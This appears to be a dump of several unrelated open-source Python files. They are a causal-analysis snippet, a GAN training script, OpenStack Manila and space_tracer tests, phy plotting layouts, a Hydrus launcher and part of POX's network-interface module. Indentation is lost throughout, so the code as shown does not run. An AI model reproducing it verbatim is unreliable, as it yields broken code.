result = [res for res in self._results if res.feature_index == feature_index]
if len(result) == 0:
if self._has_column_names:
result = [res for res in self._results if res.feature_name == feature_index]
assert len(result) == 1, f"Could not find feature with index/name {feature_index}"
return result[0].treatment_value
else:
raise ValueError(f"No feature with index {feature_index}")
return result[0].treatment_value
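# ---------------------------------------------------------------------------------------------------------
# Illustrative usage sketch (added for readers; not part of the library). It assumes the class defined above
# is exposed as `CausalAnalysis`, as the log messages suggest, and that numpy/pandas are imported in this
# module as `np`/`pd`; the column names and synthetic data below are made up purely for demonstration.
if __name__ == "__main__":
    rng = np.random.default_rng(0)
    demo_X = pd.DataFrame({"age": rng.integers(20, 65, size=500),
                           "income": rng.normal(50.0, 10.0, size=500),
                           "plan": rng.choice(["basic", "premium"], size=500)})
    demo_y = rng.normal(size=500)
    ca = CausalAnalysis(feature_inds=["age", "plan"], categorical=["plan"],
                        nuisance_models="linear", heterogeneity_model="linear")
    ca.fit(demo_X, demo_y)
    print(ca.global_causal_effect(alpha=0.05))               # one row per feature (and per category level)
    print(ca.local_causal_effect(demo_X.head(10)))           # per-sample effects for the first 10 rows
    print(ca.whatif(demo_X, demo_X["age"] + 1, "age", demo_y).head())  # counterfactual y if age were 1 higher
    print(ca.individualized_policy(demo_X, "plan").head())   # recommended treatment sorted by effect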
|
examples/gan.py | maxferrari/Torchelie | 117 | 17044 | import argparse
import copy
import torch
from torchvision.datasets import MNIST, CIFAR10
import torchvision.transforms as TF
import torchelie as tch
import torchelie.loss.gan.hinge as gan_loss
from torchelie.recipes.gan import GANRecipe
import torchelie.callbacks as tcb
from torchelie.recipes import Recipe
parser = argparse.ArgumentParser()
parser.add_argument('--cpu', action='store_true')
opts = parser.parse_args()
device = 'cpu' if opts.cpu else 'cuda'
BS = 32
tfms = TF.Compose([
TF.Resize(64),
tch.transforms.AdaptPad((64, 64)),
TF.RandomHorizontalFlip(),
TF.ToTensor()])
ds = CIFAR10('~/.cache/torch/cifar10', download=True, transform=tfms)
dl = torch.utils.data.DataLoader(ds,
num_workers=4,
batch_size=BS,
shuffle=True)
def train_net(Gen, Discr):
G = Gen(in_noise=128, out_ch=3)
G_polyak = copy.deepcopy(G).eval()
D = Discr()
print(G)
print(D)
def G_fun(batch):
z = torch.randn(BS, 128, device=device)
fake = G(z)
preds = D(fake * 2 - 1).squeeze()
loss = gan_loss.generated(preds)
loss.backward()
return {'loss': loss.item(), 'imgs': fake.detach()}
def G_polyak_fun(batch):
z = torch.randn(BS, 128, device=device)
fake = G_polyak(z)
return {'imgs': fake.detach()}
def D_fun(batch):
z = torch.randn(BS, 128, device=device)
fake = G(z)
fake_loss = gan_loss.fake(D(fake * 2 - 1))
fake_loss.backward()
x = batch[0]
real_loss = gan_loss.real(D(x * 2 - 1))
real_loss.backward()
loss = real_loss.item() + fake_loss.item()
return {'loss': loss, 'real_loss': real_loss.item(), 'fake_loss':
fake_loss.item()}
loop = GANRecipe(G, D, G_fun, D_fun, G_polyak_fun, dl, log_every=100).to(device)
loop.register('polyak', G_polyak)
loop.G_loop.callbacks.add_callbacks([
tcb.Optimizer(tch.optim.RAdamW(G.parameters(), lr=1e-4, betas=(0., 0.99))),
tcb.Polyak(G, G_polyak),
])
loop.register('G_polyak', G_polyak)
loop.callbacks.add_callbacks([
tcb.Log('batch.0', 'x'),
tcb.WindowedMetricAvg('real_loss'),
tcb.WindowedMetricAvg('fake_loss'),
tcb.Optimizer(tch.optim.RAdamW(D.parameters(), lr=4e-4, betas=(0., 0.99))),
])
loop.test_loop.callbacks.add_callbacks([
tcb.Log('imgs', 'polyak_imgs'),
tcb.VisdomLogger('main', prefix='test')
])
loop.to(device).run(100)
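# Reference sketch of the hinge GAN objectives used above (illustrative; `torchelie.loss.gan.hinge` is what
# actually runs in train_net, and its implementation details may differ). The standard formulation is
#   D: E[relu(1 - D(x_real))] + E[relu(1 + D(x_fake))],   G: -E[D(x_fake)]
# and the helpers below are an assumption-based re-implementation of that formulation, not the library code.
def _hinge_real_ref(preds: torch.Tensor) -> torch.Tensor:
    # Discriminator loss on real samples: penalize scores below the +1 margin.
    return torch.relu(1.0 - preds).mean()
def _hinge_fake_ref(preds: torch.Tensor) -> torch.Tensor:
    # Discriminator loss on generated samples: penalize scores above the -1 margin.
    return torch.relu(1.0 + preds).mean()
def _hinge_generated_ref(preds: torch.Tensor) -> torch.Tensor:
    # Non-saturating generator objective: push discriminator scores on fakes upward.
    return -preds.mean()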
train_net(tch.models.autogan_64, tch.models.snres_discr_4l)
|
manila/tests/api/views/test_quota_class_sets.py | openstack/manila | 159 | 17092 | <gh_stars>100-1000
# Copyright (c) 2017 Mirantis, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ddt
from manila.api.openstack import api_version_request as api_version
from manila.api.views import quota_class_sets
from manila import test
from manila.tests.api import fakes
@ddt.ddt
class ViewBuilderTestCase(test.TestCase):
def setUp(self):
super(ViewBuilderTestCase, self).setUp()
self.builder = quota_class_sets.ViewBuilder()
def test__collection_name(self):
self.assertEqual('quota_class_set', self.builder._collection_name)
@ddt.data(
("fake_quota_class", "2.40"), (None, "2.40"),
("fake_quota_class", "2.39"), (None, "2.39"),
("fake_quota_class", "2.53"), (None, "2.53"),
("fake_quota_class", "2.62"), (None, "2.62"),
)
@ddt.unpack
def test_detail_list_with_share_type(self, quota_class, microversion):
req = fakes.HTTPRequest.blank('/quota-sets', version=microversion)
quota_class_set = {
"shares": 13,
"gigabytes": 31,
"snapshots": 14,
"snapshot_gigabytes": 41,
"share_groups": 15,
"share_group_snapshots": 51,
"share_networks": 16,
}
expected = {self.builder._collection_name: {
"shares": quota_class_set["shares"],
"gigabytes": quota_class_set["gigabytes"],
"snapshots": quota_class_set["snapshots"],
"snapshot_gigabytes": quota_class_set["snapshot_gigabytes"],
"share_networks": quota_class_set["share_networks"],
}}
if quota_class:
expected[self.builder._collection_name]['id'] = quota_class
if (api_version.APIVersionRequest(microversion) >= (
api_version.APIVersionRequest("2.40"))):
expected[self.builder._collection_name][
"share_groups"] = quota_class_set["share_groups"]
expected[self.builder._collection_name][
"share_group_snapshots"] = quota_class_set[
"share_group_snapshots"]
if req.api_version_request >= api_version.APIVersionRequest("2.53"):
fake_share_replicas_value = 46
fake_replica_gigabytes_value = 100
expected[self.builder._collection_name]["share_replicas"] = (
fake_share_replicas_value)
expected[self.builder._collection_name][
"replica_gigabytes"] = fake_replica_gigabytes_value
quota_class_set['share_replicas'] = fake_share_replicas_value
quota_class_set['replica_gigabytes'] = fake_replica_gigabytes_value
if req.api_version_request >= api_version.APIVersionRequest("2.62"):
fake_per_share_gigabytes = 10
expected[self.builder._collection_name][
"per_share_gigabytes"] = fake_per_share_gigabytes
quota_class_set['per_share_gigabytes'] = fake_per_share_gigabytes
result = self.builder.detail_list(
req, quota_class_set, quota_class=quota_class)
self.assertEqual(expected, result)
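# Note for readers (illustrative): ddt.data combined with ddt.unpack expands the decorated method above into
# one concrete test per (quota_class, microversion) tuple at class-definition time, so every combination of
# quota class and API microversion is reported as its own test case.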
|
phy/plot/interact.py | ycanerol/phy | 118 | 17103 | <filename>phy/plot/interact.py
# -*- coding: utf-8 -*-
"""Common layouts."""
#------------------------------------------------------------------------------
# Imports
#------------------------------------------------------------------------------
import logging
import numpy as np
from phylib.utils import emit
from phylib.utils.geometry import get_non_overlapping_boxes, get_closest_box
from .base import BaseLayout
from .transform import Scale, Range, Subplot, Clip, NDC
from .utils import _get_texture, _in_polygon
from .visuals import LineVisual, PolygonVisual
logger = logging.getLogger(__name__)
#------------------------------------------------------------------------------
# Grid
#------------------------------------------------------------------------------
class Grid(BaseLayout):
"""Layout showing subplots arranged in a 2D grid.
Constructor
-----------
shape : tuple or str
Number of rows, cols in the grid.
shape_var : str
Name of the GLSL uniform variable that holds the shape, when it is variable.
box_var : str
Name of the GLSL variable with the box index.
has_clip : boolean
Whether subplots should be clipped.
Note
----
To be used in a grid, a visual must define `a_box_index` (by default) or another GLSL
variable specified in `box_var`.
"""
margin = .075
n_dims = 2
active_box = (0, 0)
_scaling = (1., 1.)
def __init__(self, shape=(1, 1), shape_var='u_grid_shape', box_var=None, has_clip=True):
super(Grid, self).__init__(box_var=box_var)
self.shape_var = shape_var
self._shape = shape
ms = 1 - self.margin
mc = 1 - self.margin
# Define the GPU transforms of the Grid layout.
# 1. Global scaling.
self.gpu_transforms.add(Scale(self._scaling, gpu_var='u_grid_scaling'))
# 2. Margin.
self.gpu_transforms.add(Scale((ms, ms)))
# 3. Clipping for the subplots.
if has_clip:
self.gpu_transforms.add(Clip([-mc, -mc, +mc, +mc]))
# 4. Subplots.
self.gpu_transforms.add(Subplot(
# The parameters of the subplots are callable as they can be changed dynamically.
shape=lambda: self._shape, index=lambda: self.active_box,
shape_gpu_var=self.shape_var, index_gpu_var=self.box_var))
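        # Net effect of the chain above: a vertex keeps being specified in [-1, 1]^2; it is scaled globally,
        # shrunk by the margin, clipped to the subplot's visible area, and finally remapped by Subplot into
        # the (row, col) cell given by `active_box`/`box_var`.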
def attach(self, canvas):
"""Attach the grid to a canvas."""
super(Grid, self).attach(canvas)
canvas.gpu_transforms += self.gpu_transforms
canvas.inserter.insert_vert(
"""
attribute vec2 {};
uniform vec2 {};
uniform vec2 u_grid_scaling;
""".format(self.box_var, self.shape_var),
'header', origin=self)
def add_boxes(self, canvas, shape=None):
"""Show subplot boxes."""
shape = shape or self.shape
assert isinstance(shape, tuple)
n, m = shape
n_boxes = n * m
a = 1 - .0001
pos = np.array([[-a, -a, +a, -a],
[+a, -a, +a, +a],
[+a, +a, -a, +a],
[-a, +a, -a, -a],
])
pos = np.tile(pos, (n_boxes, 1))
box_index = []
for i in range(n):
for j in range(m):
box_index.append([i, j])
box_index = np.vstack(box_index)
box_index = np.repeat(box_index, 8, axis=0)
boxes = LineVisual()
# We exclude this interact when adding the visual.
canvas.add_visual(boxes, clearable=False)
boxes.set_data(pos=pos)
boxes.set_box_index(box_index)
canvas.update()
def get_closest_box(self, pos):
"""Get the box index (i, j) closest to a given position in NDC coordinates."""
x, y = pos
rows, cols = self.shape
j = np.clip(int(cols * (1. + x) / 2.), 0, cols - 1)
i = np.clip(int(rows * (1. - y) / 2.), 0, rows - 1)
return i, j
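        # Worked example (comment only): with shape == (2, 3) and pos == (0., 0.5),
        # j = int(3 * (1 + 0.) / 2) = 1 and i = int(2 * (1 - 0.5) / 2) = 0, i.e. the top-middle subplot,
        # since NDC y grows upward while row indices grow downward.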
def update_visual(self, visual):
"""Update a visual."""
super(Grid, self).update_visual(visual)
if self.shape_var in visual.program:
visual.program[self.shape_var] = self._shape
visual.program['u_grid_scaling'] = self._scaling
@property
def shape(self):
"""Return the grid shape."""
return self._shape
@shape.setter
def shape(self, value):
self._shape = value
self.update()
@property
def scaling(self):
"""Return the grid scaling."""
return self._scaling
@scaling.setter
def scaling(self, value):
self._scaling = value
self.update()
#------------------------------------------------------------------------------
# Boxed
#------------------------------------------------------------------------------
class Boxed(BaseLayout):
"""Layout showing plots in rectangles at arbitrary positions. Used by the waveform view.
The boxes are specified via their center positions and optional sizes, in which case
an iterative algorithm is used to find the largest box size that will not make them overlap.
Constructor
----------
box_pos : array-like (2D, shape[1] == 2)
Position of the centers of the boxes.
box_var : str
Name of the GLSL variable with the box index.
keep_aspect_ratio : boolean
Whether to keep the aspect ratio of the bounds.
Note
----
To be used in a boxed layout, a visual must define `a_box_index` (by default) or another GLSL
variable specified in `box_var`.
"""
margin = .1
n_dims = 1
active_box = 0
_box_scaling = (1., 1.)
_layout_scaling = (1., 1.)
_scaling_param_increment = 1.1
def __init__(self, box_pos=None, box_var=None, keep_aspect_ratio=False):
super(Boxed, self).__init__(box_var=box_var)
self._key_pressed = None
self.keep_aspect_ratio = keep_aspect_ratio
self.update_boxes(box_pos)
self.gpu_transforms.add(Range(
NDC, lambda: self.box_bounds[self.active_box],
from_gpu_var='vec4(-1, -1, 1, 1)', to_gpu_var='box_bounds'))
def attach(self, canvas):
"""Attach the boxed interact to a canvas."""
super(Boxed, self).attach(canvas)
canvas.gpu_transforms += self.gpu_transforms
canvas.inserter.insert_vert("""
#include "utils.glsl"
attribute float {};
uniform sampler2D u_box_pos;
uniform float n_boxes;
uniform vec2 u_box_size;
uniform vec2 u_layout_scaling;
""".format(self.box_var), 'header', origin=self)
canvas.inserter.insert_vert("""
// Fetch the box bounds for the current box (`box_var`).
vec2 box_pos = fetch_texture({}, u_box_pos, n_boxes).xy;
box_pos = (2 * box_pos - 1); // from [0, 1] (texture) to [-1, 1] (NDC)
box_pos = box_pos * u_layout_scaling;
vec4 box_bounds = vec4(box_pos - u_box_size, box_pos + u_box_size);
""".format(self.box_var), 'start', origin=self)
def update_visual(self, visual):
"""Update a visual."""
super(Boxed, self).update_visual(visual)
box_pos = _get_texture(self.box_pos, (0, 0), self.n_boxes, [-1, 1])
box_pos = box_pos.astype(np.float32)
if 'u_box_pos' in visual.program:
logger.log(5, "Update visual with interact Boxed.")
visual.program['u_box_pos'] = box_pos
visual.program['n_boxes'] = self.n_boxes
visual.program['u_box_size'] = np.array(self.box_size) * np.array(self._box_scaling)
visual.program['u_layout_scaling'] = self._layout_scaling
def update_boxes(self, box_pos):
"""Update the box positions and automatically-computed size."""
self.box_pos, self.box_size = get_non_overlapping_boxes(box_pos)
def add_boxes(self, canvas):
"""Show the boxes borders."""
n_boxes = len(self.box_pos)
a = 1 + .05
pos = np.array([[-a, -a, +a, -a],
[+a, -a, +a, +a],
[+a, +a, -a, +a],
[-a, +a, -a, -a],
])
pos = np.tile(pos, (n_boxes, 1))
boxes = LineVisual()
box_index = np.repeat(np.arange(n_boxes), 8)
canvas.add_visual(boxes, clearable=False)
boxes.set_data(pos=pos, color=(.5, .5, .5, 1))
boxes.set_box_index(box_index)
canvas.update()
# Change the box bounds, positions, or size
#--------------------------------------------------------------------------
@property
def n_boxes(self):
"""Total number of boxes."""
return len(self.box_pos)
@property
def box_bounds(self):
"""Bounds of the boxes."""
bs = np.array(self.box_size)
return np.c_[self.box_pos - bs, self.box_pos + bs]
def get_closest_box(self, pos):
"""Get the box closest to some position."""
return get_closest_box(pos, self.box_pos, self.box_size)
# Box scaling
#--------------------------------------------------------------------------
def _increment_box_scaling(self, cw=1., ch=1.):
self._box_scaling = (self._box_scaling[0] * cw, self._box_scaling[1] * ch)
self.update()
@property
def box_scaling(self):
return self._box_scaling
def expand_box_width(self):
return self._increment_box_scaling(cw=self._scaling_param_increment)
def shrink_box_width(self):
return self._increment_box_scaling(cw=1. / self._scaling_param_increment)
def expand_box_height(self):
return self._increment_box_scaling(ch=self._scaling_param_increment)
def shrink_box_height(self):
return self._increment_box_scaling(ch=1. / self._scaling_param_increment)
# Layout scaling
#--------------------------------------------------------------------------
def _increment_layout_scaling(self, cw=1., ch=1.):
self._layout_scaling = (self._layout_scaling[0] * cw, self._layout_scaling[1] * ch)
self.update()
@property
def layout_scaling(self):
return self._layout_scaling
def expand_layout_width(self):
return self._increment_layout_scaling(cw=self._scaling_param_increment)
def shrink_layout_width(self):
return self._increment_layout_scaling(cw=1. / self._scaling_param_increment)
def expand_layout_height(self):
return self._increment_layout_scaling(ch=self._scaling_param_increment)
def shrink_layout_height(self):
return self._increment_layout_scaling(ch=1. / self._scaling_param_increment)
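# Hypothetical usage sketch (not part of the original module): attaching a Boxed
# layout to a canvas. The `canvas` object and box positions below are made up for
# illustration; visuals drawn on the canvas must expose `a_box_index` (or the
# variable passed as `box_var`) so the GLSL transform can pick the right box.
#
#   import numpy as np
#   box_pos = np.array([[-.5, -.5], [.5, -.5], [0., .5]])  # box centers in NDC
#   boxed = Boxed(box_pos=box_pos)
#   boxed.attach(canvas)          # canvas: an existing canvas-like object
#   boxed.expand_box_width()      # multiplies the box width scaling by 1.1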
class Stacked(Boxed):
"""Layout showing a number of subplots stacked vertically.
Parameters
----------
n_boxes : int
Number of boxes to stack vertically.
box_var : str
Name of the GLSL variable with the box index.
origin : str
top or bottom
Note
----
To be used in a boxed layout, a visual must define `a_box_index` (by default) or another GLSL
variable specified in `box_var`.
"""
margin = 0
_origin = 'bottom'
def __init__(self, n_boxes, box_var=None, origin=None):
self._origin = origin or self._origin
assert self._origin in ('top', 'bottom')
box_pos = self.get_box_pos(n_boxes)
super(Stacked, self).__init__(box_pos, box_var=box_var, keep_aspect_ratio=False)
@property
def n_boxes(self):
"""Number of boxes."""
return len(self.box_pos)
@n_boxes.setter
def n_boxes(self, n_boxes):
if n_boxes >= 1:
self.update_boxes(self.get_box_pos(n_boxes))
def get_box_pos(self, n_boxes):
"""Return the box bounds for a given number of stacked boxes."""
# Signal bounds.
b = np.zeros((n_boxes, 2))
b[:, 1] = np.linspace(-1, 1, n_boxes)
if self._origin == 'top':
b = b[::-1, :]
return b
@property
def origin(self):
"""Whether to show the channels from top to bottom (`top` option, the default), or from
bottom to top (`bottom`)."""
return self._origin
@origin.setter
def origin(self, value):
self._origin = value
self.update_boxes(self.get_box_pos(self.n_boxes))
self.update()
def attach(self, canvas):
"""Attach the stacked interact to a canvas."""
BaseLayout.attach(self, canvas)
canvas.gpu_transforms += self.gpu_transforms
canvas.inserter.insert_vert("""
#include "utils.glsl"
attribute float {};
uniform float n_boxes;
uniform bool u_top_origin;
uniform vec2 u_box_size;
""".format(self.box_var), 'header', origin=self)
canvas.inserter.insert_vert("""
float margin = .1 / n_boxes;
float a = 1 - 2. / n_boxes + margin;
float b = -1 + 2. / n_boxes - margin;
float u = (u_top_origin ? (n_boxes - 1. - {bv}) : {bv}) / max(1., n_boxes - 1.);
float y0 = -1 + u * (a + 1);
float y1 = b + u * (1 - b);
float ym = .5 * (y0 + y1);
float yh = u_box_size.y * (y1 - ym);
y0 = ym - yh;
y1 = ym + yh;
vec4 box_bounds = vec4(-1., y0, +1., y1);
""".format(bv=self.box_var), 'before_transforms', origin=self)
def update_visual(self, visual):
"""Update a visual."""
BaseLayout.update_visual(self, visual)
if 'n_boxes' in visual.program:
visual.program['n_boxes'] = self.n_boxes
visual.program['u_box_size'] = self._box_scaling
visual.program['u_top_origin'] = self._origin == 'top'
#------------------------------------------------------------------------------
# Interactive tools
#------------------------------------------------------------------------------
class Lasso(object):
"""Draw a polygon with the mouse and find the points that belong to the inside of the
polygon."""
def __init__(self):
self._points = []
self.canvas = None
self.visual = None
self.box = None
def add(self, pos):
"""Add a point to the polygon."""
x, y = pos.flat if isinstance(pos, np.ndarray) else pos
self._points.append((x, y))
logger.debug("Lasso has %d points.", len(self._points))
self.update_lasso_visual()
@property
def polygon(self):
"""Coordinates of the polygon vertices."""
l = self._points
# Close the polygon.
# l = l + l[0] if len(l) else l
out = np.array(l, dtype=np.float64)
out = np.reshape(out, (out.size // 2, 2))
assert out.ndim == 2
assert out.shape[1] == 2
return out
def clear(self):
"""Reset the lasso."""
self._points = []
self.box = None
self.update_lasso_visual()
@property
def count(self):
"""Number of vertices in the polygon."""
return len(self._points)
def in_polygon(self, pos):
"""Return which points belong to the polygon."""
return _in_polygon(pos, self.polygon)
def attach(self, canvas):
"""Attach the lasso to a canvas."""
canvas.attach_events(self)
self.canvas = canvas
self.create_lasso_visual()
def create_lasso_visual(self):
"""Create the lasso visual."""
self.visual = PolygonVisual()
self.canvas.add_visual(self.visual, clearable=False)
def update_lasso_visual(self):
"""Update the lasso visual with the current polygon."""
if not self.visual and self.count > 0:
return
# The following call updates a_box_index with the active box in BaseLayout.
self.visual.set_data(pos=self.polygon)
self.canvas.update()
def on_mouse_click(self, e):
"""Add a polygon point with ctrl+click."""
if 'Control' in e.modifiers:
if e.button == 'Left':
layout = getattr(self.canvas, 'layout', None)
if hasattr(layout, 'box_map'):
box, pos = layout.box_map(e.pos)
# Only update the box for the first click, so that the box containing
# the lasso is determined by the first click only.
if self.box is None:
self.box = box
# Avoid clicks outside the active box (box of the first click).
if box != self.box:
return
else: # pragma: no cover
pos = self.canvas.window_to_ndc(e.pos)
# Force the active box to be the box of the first click, not the box of the
# current click.
if layout:
layout.active_box = self.box
self.add(pos) # call update_lasso_visual
emit("lasso_updated", self.canvas, self.polygon)
else:
self.clear()
self.box = None
def __repr__(self):
return str(self.polygon)
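# Hypothetical usage sketch (not part of the original module): selecting points
# with the lasso. `canvas` and `points_ndc` are assumed to already exist; points
# are added programmatically here instead of via ctrl+click.
#
#   lasso = Lasso()
#   lasso.attach(canvas)
#   for pt in [(-.5, -.5), (.5, -.5), (0., .5)]:
#       lasso.add(pt)                       # builds the polygon
#   inside = lasso.in_polygon(points_ndc)   # boolean mask for an (N, 2) array
#   lasso.clear()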
|
test/PySrc/tests/test_code_tracer_width.py | lifubang/live-py-plugin | 224 | 17114 | <gh_stars>100-1000
from space_tracer.main import replace_input, TraceRunner
def test_source_width_positive():
code = """\
i = 1 + 1
"""
expected_report = """\
i = 1 + | i = 2"""
with replace_input(code):
report = TraceRunner().trace_command(['space_tracer',
'--source_width', '8',
'--traced_file', 'foo.py'])
assert report == expected_report
def test_source_width_negative():
code = """\
i = 1 + 1
"""
expected_report = """\
i = 1 + | i = 2"""
with replace_input(code):
report = TraceRunner().trace_command(['space_tracer',
'--source_width', '-2',
'--traced_file', 'foo.py'])
assert report == expected_report
def test_source_indent():
code = """\
i = 1 + 1
"""
expected_report = """\
i = 1 + 1 | i = 2"""
with replace_input(code):
report = TraceRunner().trace_command(['space_tracer',
'--source_indent', '4',
'--traced_file', 'foo.py'])
assert report == expected_report
def test_source_indent_small():
code = """\
i = 1 + 1
"""
expected_report = """\
i = 1 + 1 | i = 2"""
with replace_input(code):
report = TraceRunner().trace_command(['space_tracer',
'--source_indent', '2',
'--traced_file', 'foo.py'])
assert report == expected_report
def test_source_indent_negative():
code = """\
i = 1 + 1
"""
expected_report = """\
= 1 + 1 | i = 2"""
with replace_input(code):
report = TraceRunner().trace_command(['space_tracer',
'--source_indent', '-2',
'--traced_file', 'foo.py'])
assert report == expected_report
def test_trace_width():
code = """\
i = 1 + 1
"""
expected_report = """\
i = 1 + 1 | i ="""
with replace_input(code):
report = TraceRunner().trace_command(['space_tracer',
'--trace_width', '15',
'--traced_file', 'foo.py'])
assert report == expected_report
def test_trace_width_negative():
code = """\
i = 1 + 1
s = 'a' * 10
"""
expected_report = """\
i = 1 + 1 | i = 2
s = 'a' * 10 | s = 'aaaaaa"""
with replace_input(code):
report = TraceRunner().trace_command(['space_tracer',
'--trace_width', '-5',
'--traced_file', 'foo.py'])
assert report == expected_report
def test_trace_width_without_source():
code = """\
i = 1 + 1
s = 'a' * 10
"""
expected_report = """\
i = 2
s = 'aaaaaa"""
with replace_input(code):
report = TraceRunner().trace_command(['space_tracer',
'--source_width', '0',
'--trace_width', '-5',
'--traced_file', 'foo.py'])
assert report == expected_report
def test_trace_offset():
code = """\
i = 1 + 1
s = 'a' * 10
"""
expected_report = """\
i = 1 + 1 | 2
s = 'a' * 10 | 'aaaaaaaaaa'"""
with replace_input(code):
report = TraceRunner().trace_command(['space_tracer',
'--trace_offset', '3',
'--traced_file', 'foo.py'])
assert report == expected_report
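# Illustrative sketch (not part of the original tests): the width/offset flags can
# be combined, e.g. hiding the source column entirely while offsetting the trace.
# The assertion below is indicative only.
#
# def test_trace_offset_without_source():
#     code = "i = 1 + 1\n"
#     with replace_input(code):
#         report = TraceRunner().trace_command(['space_tracer',
#                                               '--source_width', '0',
#                                               '--trace_offset', '3',
#                                               '--traced_file', 'foo.py'])
#     assert '2' in report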
|
client.pyw | thatfuckingbird/hydrus-websocket-server | 1,417 | 17135 | <filename>client.pyw
#!/usr/bin/env python3
# Hydrus is released under WTFPL
# You just DO WHAT THE FUCK YOU WANT TO.
# https://github.com/sirkris/WTFPL/blob/master/WTFPL.md
from hydrus import hydrus_client
if __name__ == '__main__':
hydrus_client.boot()
|
pox/lib/interfaceio/__init__.py | korrigans84/pox_network | 416 | 17157 | # Copyright 2017 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Input and output from network interfaces.
This wraps PCap, TunTap, etc., to provide a simple, universal, cooperative
interface to network interfaces.
Currently limited to Linux.
"""
from pox.lib.pxpcap import PCap
from queue import Queue
from pox.lib.revent import Event, EventMixin
from pox.lib.ioworker.io_loop import ReadLoop
from pox.core import core
import struct
from fcntl import ioctl
import socket
from pox.lib.addresses import EthAddr, IPAddr
from pox.lib.addresses import parse_cidr, cidr_to_netmask
import os
import ctypes
IFNAMESIZ = 16
IFREQ_SIZE = 40
# from linux/if_tun.h
TUNSETIFF = 0x400454ca
TUNGETIFF = 0x800454d2
IFF_TUN = 0x0001
IFF_TAP = 0x0002
IFF_NO_PI = 0x1000
IFF_ONE_QUEUE = 0x2000
IFF_VNET_HDR = 0x4000
IFF_TUN_EXCL = 0x8000
IFF_MULTI_QUEUE = 0x0100
IFF_ATTACH_QUEUE = 0x0200
IFF_DETACH_QUEUE = 0x0400
IFF_PERSIST = 0x0800
IFF_NOFILTER = 0x1000
#from linux/if.h (flags)
IFF_UP = 1<<0
IFF_BROADCAST = 1<<1
IFF_DEBUG = 1<<2
IFF_LOOPBACK = 1<<3
IFF_POINTOPOINT = 1<<4
IFF_NOTRAILERS = 1<<5
IFF_RUNNING = 1<<6
IFF_NOARP = 1<<7
IFF_PROMISC = 1<<8
IFF_ALLMULTI = 1<<9
IFF_MASTER = 1<<10
IFF_SLAVE = 1<<11
IFF_MULTICAST = 1<<12
IFF_PORTSEL = 1<<13
IFF_AUTOMEDIA = 1<<14
IFF_DYNAMIC = 1<<15
IFF_LOWER_UP = 1<<16
IFF_DORMANT = 1<<17
IFF_ECHO = 1<<18
# Unless IFF_NO_PI, there's a header on packets:
# 16 bits of flags
# 16 bits (big endian?) protocol number
# from /usr/include/linux/sockios.h
SIOCGIFHWADDR = 0x8927
SIOCGIFMTU = 0x8921
SIOCSIFMTU = 0x8922
SIOCGIFFLAGS = 0x8913
SIOCSIFFLAGS = 0x8914
SIOCSIFHWADDR = 0x8924
SIOCGIFNETMASK = 0x891b
SIOCSIFNETMASK = 0x891c
SIOCGIFADDR = 0x8915
SIOCSIFADDR = 0x8916
SIOCGIFBRDADDR = 0x8919
SIOCSIFBRDADDR = 0x891a
SIOCSIFNAME = 0x8923
SIOCADDRT = 0x890B # rtentry (route.h) for IPv4, in6_rtmsg for IPv6
SIOCDELRT = 0x890C
# from /usr/include/linux/if_arp.h
ARPHRD_ETHER = 1
ARPHRD_IEEE802 = 1
ARPHRD_IEEE1394 = 24
ARPHRD_EUI64 = 27
ARPHRD_LOOPBACK = 772
ARPHRD_IPGRE = 778
ARPHRD_IEE802_TR = 800
ARPHRD_IEE80211 = 801
ARPHRD_IEE80211_PRISM = 802
ARPHRD_IEE80211_RADIOTAP = 803
ARPHRD_IP6GRE = 823
class rtentry (object):
"""
Wrapper for Linux rtentry
Only tries to capture IPv4 usage.
Possibly better done with ctypes.
"""
# flags
RTF_UP = 0x0001 # usable
RTF_GATEWAY = 0x0002 # dst is gateway
RTF_HOST = 0x0004 # host route
RTF_REINSTATE = 0x0008 # reinstate after timeout
RTF_DYNAMIC = 0x0010 # created dynamically (by redirect)
RTF_MODIFIED = 0x0020 # modified dynamically (by redirect)
RTF_MSS = 0x0040 # use specific MSS for this route
RTF_WINDOW = 0x0080 # use per-route window clamping
RTF_IRTT = 0x0100 # use initial RTT
RTF_REJECT = 0x0200 # reject route
# fields
rt_hash = 0
rt_dst = IPAddr("0.0.0.0")
rt_gateway = IPAddr("0.0.0.0")
rt_genmask = IPAddr("0.0.0.0")
rt_flags = 0
rt_refcnt = 0
rt_use = 0
rt_ifp = 0 # ptr to struct ifnet
rt_metric = 0
rt_dev = None # device name
rt_mss = 0
rt_window = 0 # window clamping
rt_irtt = 0 # initial RTT
def pack (self):
if self.rt_dev:
s = ctypes.c_char_p(self.rt_dev + "\0") # Null terminator necessary?
dev = ctypes.cast(s, ctypes.c_void_p).value
self._buf = s # You must use the resulting packed string before changing
# rt_dev!
else:
dev = 0
return struct.pack("L16s16s16shhLPhPLLH",
self.rt_hash,
sockaddr_in(self.rt_dst).pack(),
sockaddr_in(self.rt_gateway).pack(),
sockaddr_in(self.rt_genmask).pack(),
self.rt_flags,
self.rt_refcnt,
self.rt_use,
self.rt_ifp,
self.rt_metric,
dev,
self.rt_mss,
self.rt_window,
self.rt_irtt)
class sockaddr_in (object):
"""
Wrapper for sockaddr_in
"""
sin_family = socket.AF_INET
sin_port = 0
sin_addr = IPAddr("0.0.0.0")
def __init__ (self, addr=None, port=None):
if addr is not None:
self.sin_addr = IPAddr(addr)
if port is not None:
self.sin_port = port
def pack (self):
r = struct.pack("hH", self.sin_family, self.sin_port)
r += self.sin_addr.raw
r += ("\0" * 8)
return r
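# Illustrative sketch (not part of the original module): roughly the rtentry that
# Interface.add_default_route builds for a gateway at 192.168.1.1 on eth0, packed
# into the byte layout expected by the SIOCADDRT ioctl.
#
#   r = rtentry()
#   r.rt_dst = IPAddr("0.0.0.0")
#   r.rt_genmask = IPAddr("0.0.0.0")
#   r.rt_gateway = IPAddr("192.168.1.1")
#   r.rt_flags = rtentry.RTF_UP | rtentry.RTF_GATEWAY
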